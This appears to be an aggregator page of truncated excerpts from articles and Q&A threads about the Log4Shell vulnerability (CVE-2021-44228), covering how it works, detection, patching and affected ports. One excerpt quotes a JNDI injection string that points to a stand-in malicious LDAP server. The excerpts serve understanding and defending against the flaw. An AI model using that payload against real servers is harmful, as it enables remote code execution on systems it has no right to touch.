Collaborate Disseminate
Log4shell is making the news. A vulnerability in the widely used logging tool Log4J is putting many servers and even some desktop applications at risk of remote code execution.
How does this vulnerability work? What sort of mistake makes i… Continue reading How does the log4shell vulnerability work?
Everyone is talking about Log4Shell, a zero-day remote code execution exploit in versions of log4j, the popular open source Java logging library. Continue reading Log4Shell: The race is on to fix millions of systems and internet-connected devices
According to the notes for CVE-2021-44228 at mitre.org:
Java 8u121 (see
https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
protects against remote code execution by defaulting
"com.sun.jndi.rmi.object.trustURLCodeba… Continue reading Am I protected from Log4j vulnerability if I run Java 8u121 or newer?
I am using a Mac for my daily work, But I do not know if I am vulnerable for the log4j exploit. Is there a way to find out? Is there a way to find all the applications that are using java? How to protect me? Update java? Update the log lib… Continue reading How to find out I an application is vulnerable for log4j?
Find out how to deal with the Log2Shell vulnerability right across your estate. Yes, you need to patch, but that helps everyone else along with you! Continue reading Log4Shell explained – how it works, why you need to know, and how to fix it
A zero-day exploit affecting the popular Apache Log4j utility
(CVE-2021-44228) was made public on December 9, 2021 that results in
remote code execution (RCE). (From an email CloudFlare sent to users)
Is a site susceptible to the Log4J e… Continue reading Can one protect from the Log4j exp by sanitizing the parameters?
Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, to 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is depending on log4j-core:2.15.0 and log4j… Continue reading How to validate if Log4Shell patch is applied?
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:
paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug… Continue reading Does the log4j RCE vulnerability run even if the message is just a part of the logged string?
Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren’t because the vulnerability uses JNDI (Java Naming and Directory Interf… Continue reading Does CVE-2021-44228 impact Log4j ports?
Just when you thought it was safe to relax for the weekend… a critical bug showed up in Apache’s Log4j product Continue reading “Log4Shell” Java vulnerability – how to safeguard your servers